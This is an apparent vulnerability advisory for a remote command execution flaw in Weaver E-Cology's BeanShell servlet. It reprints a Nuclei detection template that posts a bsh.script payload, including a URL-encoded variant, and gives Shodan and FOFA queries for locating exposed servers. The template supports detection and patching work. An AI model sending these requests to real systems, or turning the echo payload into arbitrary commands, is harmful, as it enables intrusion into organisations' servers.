weaver-ecology-bshservlet-rce: Weaver E-Cology BeanShell - Remote Command Execution

日期: 2025-08-01 | 影响软件: Weaver E-Cology BeanShell | POC: 已公开

漏洞描述

Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.

PoC代码[已公开]

id: weaver-ecology-bshservlet-rce

info:
  name: Weaver E-Cology BeanShell - Remote Command Execution
  author: SleepingBag945
  severity: critical
  description: |
    Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
  classification:
    cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: weaver
    product: e-cology
    shodan-query: ecology_JSessionid
    fofa-query: app="泛微-协同办公OA"
  tags: beanshell,rce,weaver

http:
  - raw:
      - |
        POST /weaver/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=print%28%22{{randstr}}%22%29%3B
      - |
        POST /weaver/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "BeanShell Test Servlet"
          - "(?i)<pre>(\n.*){{randstr}}"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008496411a40e9a5043561b9efff2c761915719fa9b5b7e5b38717254fe8f6d0e0022100c469e85cac0e5dba173db4b536a544dfa5818a02e14d55833a9ded6439f8682d:922c64590222798bb761d5b6d8e72950